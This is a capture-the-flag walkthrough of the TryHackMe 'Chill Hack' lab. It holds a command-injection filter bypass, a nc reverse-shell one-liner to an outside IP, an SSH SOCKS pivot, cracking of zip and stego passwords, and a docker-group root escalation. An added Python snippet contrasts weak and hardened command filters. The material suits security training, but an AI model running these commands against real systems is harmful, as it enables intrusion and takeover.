Room Link: https://tryhackme.com/room/chillhack
Initial Scan
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
Scan all ports: no other ports found.
TCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Many commands, when run through the form, just return this page.
Command Injection
Used this reference to find a way to bypass the filter. Adding a \ in the middle of the first command word (r\m instead of rm) gets it past the filter, and the shell strips the backslash and still runs the same command, so we can run any command we want.
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
Web
r\m /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.172.186 1337 >/tmp/f
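Why the r\m trick gets past the form, as an added illustration that is not code from the room or this walkthrough: a filter that blocklists the raw first word (a constructed sample assumed to resemble the room's check) beside one that parses the command the way sh will and allow-lists the program name. The blocklist, allowlist and function names are assumptions of this example.

```python
import shlex

# Constructed sample blocklist (not the room's real list): the form refuses a
# command whose raw first word is on it, which is exactly what r\m slips past.
BLOCKED = {"rm", "nc", "bash", "sh", "python", "python3"}
# Constructed allowlist of programs the form is meant to run.
ALLOWED = {"ls", "whoami", "id", "date"}
SHELL_METACHARS = set(";|&`$<>\n(){}")

# The payload from the walkthrough, used here as the test input for both filters.
PAYLOAD = r"r\m /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.172.186 1337 >/tmp/f"


def naive_filter(cmd: str) -> bool:
    """The weak check: compare the raw first word against a blocklist.
    Returns True when the command would be handed to the shell.
    It never dequotes, and never looks past the first ';' or '|'."""
    words = cmd.split()
    return not words or words[0] not in BLOCKED


def shell_sees(cmd: str) -> str:
    """First program name after sh-style dequoting: shlex turns r\\m into rm,
    which is what /bin/sh will execute regardless of what the filter saw."""
    try:
        tokens = shlex.split(cmd)
    except ValueError:          # unbalanced quote or trailing backslash
        return ""
    return tokens[0] if tokens else ""


def hardened_filter(cmd: str) -> bool:
    """Reject shell metacharacters outright, then allow-list the program name
    as the shell will actually resolve it, instead of blocklisting raw text."""
    if SHELL_METACHARS & set(cmd):
        return False
    return shell_sees(cmd) in ALLOWED
```

The real fix is to stop handing user text to a shell at all: run the allow-listed program with subprocess.run([program, *args]) and no shell, so quoting tricks have nothing to act on.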
Victim
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
Victim
sudo -u apaar /home/apaar/.helpline.sh
/bin/bash
/bin/bash
Victim(apaar)
python3 -c 'import pty; pty.spawn("/bin/bash")'
Victim(apaar)
netstat -at
curl localhost:9001
Pivot
Kali
ssh-keygen -t rsa
cat /root/.ssh/id_rsa.pub
Victim
Copy the contents of id_rsa.pub into /home/apaar/.ssh/authorized_keys
Kali
vi /etc/proxychains.conf
proxychains.conf
socks4 127.0.0.1 9050
Kali
ssh -D 9050 apaar@$VICTIM
I can now reach the web page from Kali through the proxy, but have no login credentials to use.
Found MySQL credentials in one of the PHP files.
Victim(apaar)
cat /var/www/files/index.php
Victim(apaar)
mysql -u root -p webportal
Password: !@m+her00+@db
Victim(mysql)
SHOW DATABASES;
use webportal;
SHOW TABLES;
select * from users;
Both sets of credentials work on the login page, and both bring up this page.
Used no password (empty passphrase) for steghide.
Kali
steghide extract -sf hacker-with-laptop_23-2147985341.jpg
Cracking Password Protected Zip Files
Kali
zip2john backup.zip > secure_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt secure_john.txt
Kali
unzip backup.zip
Password: pass1word
Kali
cat source_code.php
echo "IWQwbnRLbjB3bVlwQHNzdzByZA==" | base64 -d
Victim(apaar)
su anurodh
Password: !d0ntKn0wmYp@ssw0rd
Privilege Escalation
anurodh is a member of the docker group, which the other user was not. GTFOBins lists a way to get a shell through docker, so I tried it and got root.
Link: https://gtfobins.github.io/gtfobins/docker/#shell
Victim(anurodh)
groups
docker run -v /:/mnt --rm -it alpine chroot /mnt sh